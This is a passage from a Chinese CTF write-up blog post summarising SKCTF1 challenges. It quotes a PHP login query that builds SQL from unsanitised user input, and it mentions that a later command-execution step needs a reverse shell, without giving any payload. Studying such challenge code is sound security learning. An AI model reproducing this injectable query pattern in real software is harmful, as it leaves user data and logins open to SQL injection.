<p>源码中没有对结果做判断，只是做了是否结果是否存在的判断，导致漏洞的产生。    </p>
<figure class="highlight plain"><table><tr><td class="code"><pre><span class="line">$sql&#x3D;&quot;SELECT username,password FROM admin WHERE username&#x3D;(&quot;.$username.&quot;)&quot;;</span><br><span class="line">    $result&#x3D;mysql_query($sql);</span><br><span class="line">	@$row &#x3D; mysql_fetch_array($result);</span><br><span class="line">	if (!empty($row) &amp;&amp; $row[&#39;password&#39;]&#x3D;&#x3D;&#x3D;md5($password))&#123;</span><br><span class="line">		$_SESSION[&#39;login&#39;]&#x3D;1;</span><br></pre></td></tr></table></figure>

<p>接下来是命令执行，但是没有回显，需要反弹shell。</p>
<hr>
<p>暂时这么多，剩下的需要学习学习才能做得出了。。。</p>
<hr>
<p>2018-4-18 更新<br>做出了 第四扩展FS，熟悉吗</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:v0wldl@163.com">V0WKeep3r</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="http://v0w.top/2018/04/14/SKCTF1-%E6%80%BB%E7%BB%93/">http://v0w.top/2018/04/14/SKCTF1-%E6%80%BB%E7%BB%93/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="http://v0w.top">V0W's Blog</a>！</span></div></div><div class="post-meta__tag-list"></div><div class="post-qr-code"><div class="post-qr-code-item"><img class="post-qr-code__img" src="/img/AlipayQR.png"><div class="post-qr-code__desc">支付宝打赏</div></div><div class="post-qr-code-item"><img class="post-qr-code__img" src="/img/wechatQR.png"><div class="post-qr-code__desc">微信打赏</div></div></div><nav id="pagination"><div class="prev-post pull-left"><a href="/2018/04/21/SKCTF2-wp/"><i class="fa fa-chevron-left">  </i><span>SKCTF2</span></a></div><div class="next-post pull-right"><a href="/2018/01/15/2018-hgame%20CTFwp%EF%BC%88%E6%9D%AD%E7%94%B5%E4%BF%A1%E5%AE%89%EF%BC%89week3/"><span>2018-hgame CTF week3</span><i class="fa fa-chevron-right"></i></a></div></nav><div id="vcomment"></div><script src="https://cdn1.lncld.net/static/js/3.0.4/av-min.js"></script><script src="https://cdn.jsdelivr.net/npm/valine/dist/Valine.min.js"></script><script>var notify = 'false' == 'true';
var verify = 'false' == 'true';
var record_ip = 'false' == 'true';
var GUEST_INFO = ['nick','mail','link'];
var guest_info = 'nick,mail,link'.split(',').filter(function(item){
  return GUEST_INFO.indexOf(item) > -1
});
guest_info = guest_info.length == 0 ? GUEST_INFO :guest_info;
window.valine = new Valine({
  el:'#vcomment',
  notify:notify,
  verify:verify,
  recordIP:record_ip,
  appId:'xuqLRcah5FaInOgKRdj9JB3V-gzGzoHsz',
  appKey:'8vMPXnFoh7Fih1g29jw4JNxl',
  placeholder:'师傅可以留下你的评论和邮箱，V0W能够通过邮件get并回复哦～',
  avatar:'retro',
  guest_info:guest_info,
  pageSize:'10',
  lang: 'zh-cn'
})</script></div></div><footer class="footer-bg" style="background-image: url(/img/index.jpg)"><div class="layout" id="footer"><div class="copyright">&copy;2018 - 2020 By V0WKeep3r</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.8.2"></script><script src="/js/fancybox.js?version=1.8.2"></script><script src="/js/sidebar.js?version=1.8.2"></script><script src="/js/copy.js?version=1.8.2"></script><script src="/js/fireworks.js?version=1.8.2"></script><script src="/js/transition.js?version=1.8.2"></script><script src="/js/scroll.js?version=1.8.2"></script><script src="/js/head.js?version=1.8.2"></script><script src="/js/search/local-search.js"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script><div class="search-dialog" id="local-search"><div class="search-dialog__title" id="local-search-title">本地搜索</div><div id="local-input-panel"><div id="local-search-input"><div class="local-search-box"><input class="local-search-box--input" placeholder="搜索文章"></div></div></div><hr><div id="local-search-results"><div id="local-hits"></div><div id="local-stats"><div class="local-search-stats__hr" id="hr"><span>由</span> <a target="_blank" rel="noopener" href="https://github.com/wzpan/hexo-generator-search" style="color:#49B1F5;">hexo-generator-search</a>
 <span>提供支持</span></div></div></div><span class="search-close-button"><i class="fa fa-times"></i></span></div><div class="search-mask"></div></body></html>